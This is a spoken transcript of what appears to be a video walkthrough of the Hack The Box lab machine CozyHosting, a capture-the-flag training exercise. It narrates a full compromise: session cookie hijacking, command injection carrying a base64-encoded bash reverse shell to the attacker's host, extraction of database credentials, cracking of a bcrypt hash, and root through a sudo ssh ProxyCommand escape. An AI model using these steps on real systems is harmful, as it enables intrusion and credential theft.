Hey guys, today's video is gonna be another hack the box video. This box is called CozyHosting. CozyHosting machine will teach you about Burp Suite, HTTP exploit. Let's get to it. As always, we're gonna need to run an nmap. It's gonna be nmap sc sv and the IP address. Nmap will scan the IP address and lets us know which port is open. Nmap scan shows us that port 22 SSH is open, port 80 is open on HTTP. It's gonna be running on Nginx. Nmap will let you know that it's not direct to the DNS server. If you put the IP address in the search bar, it will not reach the DNS server. What you need to do is type in echo IP address and then CozyHosting.htb sudo t-a etc/host. This will let the domain know which IP address is associated with. If you refresh the browser, it will take it to a CozyHosting website. It's just a regular website. You can do login. What I like to do is do a directory search. -u CozyHosting.hackthebox and let that run for a minute. It looks like we can access section. Let's go check that out. It looks like there's a K Anderson section. So let's go check it out. Go to login. Over at the login page, we can inspect the page. And over at storage, the cookies tab, you can see the session ID and the value. We can manipulate this value in order to gain access. So back over here, we need to copy K Anderson value. Then we paste it there. Then refresh the page, we should be able to log in at K Anderson. Down here, there's a connection setting. Let's try to connect to our machine. Let's open up a listening port. 137 10.10.14.28 at port 1337. I don't think it will work. Alright, let's send it. We need to open up Burp Suite. If you can master Burp Suite, you're able to do a lot of manipulation with the website connection. Alright, let's turn this on. And let's try that again. Let's go back to Burp Suite and send it to repeater. Let's go to repeater and let's run that. For HTTP server, a script needs to be encrypted at base 64. So what we need to do is bash-i greater than dev.tcp 10.10.14.28 slash listening port 1337 0 greater than 1. So we need to encode it as base 64. Let's have a plus in the script, so we need to move that. There should be a space right here. That will work. By putting a space between the bash and I, it should be able to remove the plus sign. We can copy that. Go to a repeater. Over at a repeater, we can type squiggly line, echo, comma acting as like a space, double quote. Paste in the script at base 64 encrypted, your pike, and squiggly line, base 64, comma, space, as in space, -d, as in descript, and another pike, and bash. And semicolon to end it. Over at a terminal, we need to open up a listening port and see that's LVMP 1337, which is our listening port that we have used. If we send it, it should be able to give us shell. And it didn't. Oh, we forgot. We forgot the squiggly line right here. The squiggly brackets. Now send it. Bam, we're in. Who am I? Now we're able to access the machine as app. If you press any button, you can see the shell is not stable right now. What we need to do is type in Python 3-C import. Oh Lord. Import pty semicolon pty.spawn /bin bash, and then close it. Press enter, and then Control Z to get out. Then you need to type in stty raw-echo and then fg. Enter 2 times, and the shell is more stabilized. If you type in ls, you should be able to see there's a jar file. Let's download that jar file to a machine so we can unzip it. Type in Python 3-m http.server 9000. Over at a machine, we should be able to type in wget 10.10.11.230, which is the IP address for CozyHosting. And the listening port is 9000. And the file is, and let it download. Let's check it out. We should have the downloading file. So what we need to do is 7-zip x ls. There's a boot folder. Let's go into it. And let's go into the classes folder. Classes. There's an application property. Let's open it up. The application property shows us progress SQL, progress password. Let's copy that. Back onto our host machine, what we need to type is psql-h for hosting, and it's gonna be localhost capital U. Make sure it's a capital U for user, and it's gonna be Postgres. And then it's gonna ask you for your password. Paste in the password that we copied earlier, and we're in. What you need to do is type /list to list all the user. It looks like we have CozyHosting that one is the name, so let's just get out of it. We need to extract CozyHosting database. So psql h for host, as in local host, that's capital U's, Postgres -d directory for CozyHosting. And we put in the password. We should be able to log in at CozyHosting and type in /d. It will give us a user. This is what we need, the user information. So we can type in select star from user. Make sure you end it up with a semicolon or else it won't work. And look like we have the admin password. So now we can copy that. Let's go back to our machine and open up another terminal. We're gonna create nano hash.txt and paste in the hash. Control X, save it, yes, press Y and enter. It looked like a bcrypt hash with the $sign and the 2A in the front. But you can check what kind of hash it is. Type in hash ID, hash.txt. And this will analyze the hash and tell you it's a bcrypt. Now knowing that it's a bcrypt hash, we can type in hashcat, that's M, it's a 3200 for bcrypt, and hash.txt, And from here we can get to the user share world list rockU.txt and let it go. While we're waiting for Hashcat to decrypt the password, let's go back to the host. Control Z to get out. What I typically like to do is type in cat xc pwd grep sh $. Pull up all the users that are able to log in with secure cell. So look like there's a charge, root, app, and progress. And let's go back to our terminal. It looks like we have cracked the password. Now let's press up and that dash show, it will show us the password. The password is Manchester United. Now let's use SSH to log in Josh with the password. Josh at CozyHosting. Yes. And we need to paste in the password. And we're able to gain Josh login. Type in ls and there's the user information. Now we need to gain root privilege. We can look if Josh can run any root command. And paste in his password. It looks like Josh is able to execute user/bin/ssh. There's an exploit for this. Let's go to ttfo bin. And let's search for SSH. And it looked like down here. So there's an exploit. If you copy this exploit right here and we paste in the exploit. So what this exploit does is a proxy command and it should be able to gain us as root. And let's go to root folder and ls. There we go, we have root information. This is a really fun box. Thank you for watching. I'll see you in the next video.